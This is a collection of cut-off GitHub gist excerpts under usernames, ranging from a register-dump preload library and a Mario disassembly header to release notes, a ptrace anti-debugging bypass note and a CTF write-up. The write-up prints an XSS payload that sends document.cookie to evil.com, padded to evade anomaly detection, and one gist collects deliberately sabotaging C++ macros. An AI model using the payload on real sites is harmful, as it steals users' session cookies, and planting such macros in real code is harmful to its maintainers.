nelhage

/*
 * $ gcc -m32 -fPIC -shared -o regdump.so regdump.c
 * $ LD_PRELOAD=$(pwd)/regdump.so ./test
 *
 * Dump register state with 'ud2a' (0F 0B)
 */

#define _GNU_SOURCE
#include <signal.h>
#include <stdlib.h>

KvanTTT

public static long RationalNumber(long i, long j)
{
	if (j == 1)
	{
		if (i == 0)
			return 1;
		else if (i == 1)
			return 2;
	}

1wErt3r

;SMBDIS.ASM - A COMPREHENSIVE SUPER MARIO BROS. DISASSEMBLY
;by doppelganger ([email protected])

;This file is provided for your own use as-is.  It will require the character rom data
;and an iNES file header to get it to work.

;There are so many people I have to thank for this, that taking all the credit for
;myself would be an unforgivable act of arrogance. Without their help this would
;probably not be possible.  So I thank all the peeps in the nesdev scene whose insight into
;the 6502 and the NES helped me learn how it works (you guys know who you are, there's no 

ekse

[DISASM]
000000	 //Instruction
aaaaaa	 //Directive
f3c5ff	 //Macro name
7e6082	 //Register name
666666	 //Other keywords
ffffff	 //Dummy data name
b9ebeb	 //Dummy code name
b9ebeb	 //Dummy unexplored name
bbecff	 //Hidden name

audreyfeldroy

• Update HISTORY.md
• Commit the changes:

git add HISTORY.md
git commit -m "Changelog for upcoming release 0.1.1."

• Update version number (can also be minor or major)

bumpversion patch

JeffPaine

Moved

Now located at https://github.com/JeffPaine/beautiful_idiomatic_python.

Why it was moved

Github gists don't support Pull Requests or any notifications, which made it impossible for me to maintain this (surprisingly popular) gist with fixes, respond to comments and so on. In the interest of maintaining the quality of this resource for others, I've moved it to a proper repo. Cheers!

aras-p

// Just before switching jobs:
// Add one of these.
// Preferably into the same commit where you do a large merge.
//
// This started as a tweet with a joke of "C++ pro-tip: #define private public",
// and then it quickly escalated into more and more evil suggestions.
// I've tried to capture interesting suggestions here.
//
// Contributors: @r2d2rigo, @joeldevahl, @msinilo, @_Humus_,
// @YuriyODonnell, @rygorous, @cmuratori, @mike_acton, @grumpygiant,

rspeer

"""
This file contains code that, when run on Python 2.7.5 or earlier, creates
a string that should not exist: u'\Udeadbeef'. That's a single "character"
that's illegal in Python because it's outside the valid Unicode range.

It then uses it to crash various things in the Python standard library and
corrupt a database.

On Python 3... well, this file is full of syntax errors on Python 3. But
if you were to change the print statements and byte literals and stuff:

hugsy

Even though well known methods exist to bypass ptrace deactivation on a process when spawning (fake ptrace() preloading, breakpoint on ptrace(), etc... ), it is trickier when process is already protected.

Thankfully Linux 3.2+ was generous enough to provide read/write capabilities to another process with 2 new system calls: sys_process_vm_readv and sys_process_vm_writev. (see https://github.com/torvalds/linux/blob/master/arch/x86/syscalls/syscall_64.tbl#L319)

Manual says:

These system calls transfer data between the address space of the calling

ngo

In this task we had to bypass a badly-trained anomaly detection algorithm and perform an XSS attack.

We didn't have to figure out exactly how the anomaly detection worked, but as soon as we understood that the anomaly scoring was based on the density of the "bad" (i.e. non-alphanumeric) chars in the payload. Thus, the solution was to dissolve the attack payload in a lot of benign symbols ([AxN] represents a string of N A's):

anomaly.php?name=[Ax600]%3Cvideo+[Ax300]+src=//evil.com+[Ax300]+onerror=src%2b=document.cookie+[Ax1000]+/>